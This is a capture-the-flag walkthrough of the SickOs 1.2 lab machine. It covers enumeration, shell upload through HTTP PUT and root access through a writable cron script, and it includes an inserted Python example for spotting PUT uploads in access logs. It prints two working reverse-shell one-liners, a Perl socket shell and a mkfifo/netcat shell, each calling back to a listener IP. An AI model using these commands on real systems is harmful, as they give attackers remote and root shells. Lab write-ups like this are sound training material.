SickOs: 1.2 Walkthrough

“So in war, the way is to avoid what is strong, and strike at what is weak.” ― Sun Tzu, The Art of War

This is the second release in the SickOs series and is independent of the prior releases. The scope of the challenge is to gain the highest privileges on the system.

Enumeration

It all starts with enumeration.

📍 We might have to get credentials from the web page and use them to access SSH.

📍 We might have LFI/SQLi/RCE on the web page.

📍 Could be something new…

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11, Linux 3.16–4.6, Linux 3.2–4.9, Linux 4.4

OpenSSH 5.9p1 Debian 5ubuntu1.8

🔑 It is running Linux (Ubuntu).

More Enumeration…

  1. SSH

Only a user enumeration vulnerability.

  2. HTTP

  • Manual Walk + robots.txt + source code

Nothing on this.

  • Nikto scan
lighttpd/1.4.28 🔑
  • Gobuster

Finding the POI (Point Of Intrusion)

mod_userdir is a possibility.

No luck with these vulnerabilities.

After a long struggle, I was able to insert data using PUT.
perl -e 'use Socket;$i="192.168.103.195";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Got a reverse shell on remote port 443.
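From the defender's side, a writable PUT like the one above leaves a clear trail in the web server's access log. The following is an added example, not part of the original walkthrough: it flags every PUT that the server answered with a 2xx status and lists later requests for the same path. It assumes the access log is in combined log format; the sample lines, addresses and paths are constructed.

```python
import re

# Constructed sample lines in combined log format (assumed format;
# the addresses and paths are made up for this example).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 163 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2024:10:04:40 +0000] "OPTIONS /uploads/ HTTP/1.1" 200 0 "-" "curl/7.88"
192.0.2.10 - - [12/Mar/2024:10:05:11 +0000] "PUT /uploads/a.php HTTP/1.1" 201 0 "-" "curl/7.88"
192.0.2.10 - - [12/Mar/2024:10:05:30 +0000] "GET /uploads/a.php?x=1 HTTP/1.1" 200 0 "-" "curl/7.88"
192.0.2.77 - - [12/Mar/2024:10:06:00 +0000] "PUT /index.php HTTP/1.1" 403 345 "-" "curl/7.88"
198.51.100.5 - - [12/Mar/2024:10:07:00 +0000] "GET /robots.txt HTTP/1.1" 404 345 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_put_uploads(log_text):
    """Return one finding per successful PUT, with later hits on the same path."""
    findings = {}  # path -> finding; dict order follows upload order
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        path = m["path"].split("?", 1)[0]  # compare paths without the query string
        status = int(m["status"])
        if m["method"] == "PUT" and 200 <= status < 300:
            findings[path] = {"path": path, "uploader": m["ip"],
                              "uploaded_at": m["ts"], "status": status,
                              "later_hits": []}
        elif path in findings and m["method"] in ("GET", "POST"):
            findings[path]["later_hits"].append((m["ts"], m["ip"], status))
    return list(findings.values())

if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        print(f"PUT {f['path']} -> {f['status']} from {f['uploader']} at {f['uploaded_at']}")
        for ts, ip, status in f["later_hits"]:
            print(f"  later request: {ip} at {ts} -> {status}")
```

A finding whose path ends in a server-executed extension and that has later hits deserves immediate review, and the durable fix is to stop the server accepting PUT on that directory.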


Privilege Escalation

Found a vulnerable cron job. It is present in /etc/cron.daily.

Do the following to get a root shell back…

echo '#!/bin/bash' > update
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f' >> update
chmod 777 update

Catch the shell when it is executed.